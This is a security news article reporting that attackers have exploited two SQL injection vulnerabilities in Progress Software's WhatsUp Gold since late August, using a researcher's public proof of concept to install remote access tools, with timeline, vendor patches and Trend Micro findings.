Hackers Attack WhatsUp Gold Using Vulnerability Since August

Hackers used publicly available exploit code to discover two critical vulnerabilities in Progress Software’s WhatsUp Gold network availability and performance monitoring solution.

The two vulnerabilities exploited in attacks since August 30 are SQL injection vulnerabilities tracked as CVE-2024-6670 and CVE-2024-6671. They allow for the retrieval of encrypted passwords without authentication.

Even though the vendor addressed the security issues more than two weeks ago, many organizations still need to update their software, and cybercriminals are taking advantage of the delay.

Progress Software released security updates on August 16 to address these issues, and added instructions on how to detect potential threats in a September 10 security bulletin.

Security researcher Sina Kheirkhah (@SinSinology), who discovered the vulnerabilities and reported them to the Zero Day Initiative (ZDI) on May 22. On August 30, the researcher published proof-of-concept (PoC) exploits.

In a white paper, the researcher explains how to exploit the problem of poor user input hygiene to insert arbitrary passwords into the password fields of administrator accounts, thus making them vulnerable to takeover.

In wild exploitation

A report today from cybersecurity firm Trend Micro found that hackers have begun exploiting these vulnerabilities. Based on the observations, the attacks are based on Kheirkhah’s PoC, which involves bypassing authentication and reaching the remote code execution and payload deployment stage.

The security firm’s telemetry data detected the first signs of active security exploitation five hours after the researcher published the PoC exploit code.

Attackers leverage the legitimate Active Monitor PowerShell Script functionality of WhatsUp Gold to run multiple PowerShell scripts via NmPoller.exe, downloaded from remote URLs.

Attackers then use the legitimate Windows tool “msiexec.exe” to install various remote access tools (RATs) via MSI packages, including Atera Agent, Radmin, SimpleHelp Remote Access, and Splashtop Remote.

The placement of these RATs allows attackers to establish persistence on compromised systems. In some cases, Trend Micro has observed the deployment of multiple payloads.

Analysts were unable to attribute these attacks to any particular threat group, but the use of multiple RATs suggests they may have been attacks by cybercriminals using ransomware.

In a comment to BleepingComputer, Kheirkhah thanked ZDI and expressed hope that its descriptions and proofs of concept will help improve the security of the affected product in the future.

This is not the first time this year that WhatsUp Gold has come under fire due to publicly available security flaws.

In early August, threat intelligence organization Shadowserver Foundation reported that its honeypots had detected attempts to exploit CVE-2024-4885, a critical remote code execution vulnerability disclosed on June 25, 2024.

This vulnerability was also discovered by Kheirkhah, who published the full information on his blog two weeks later.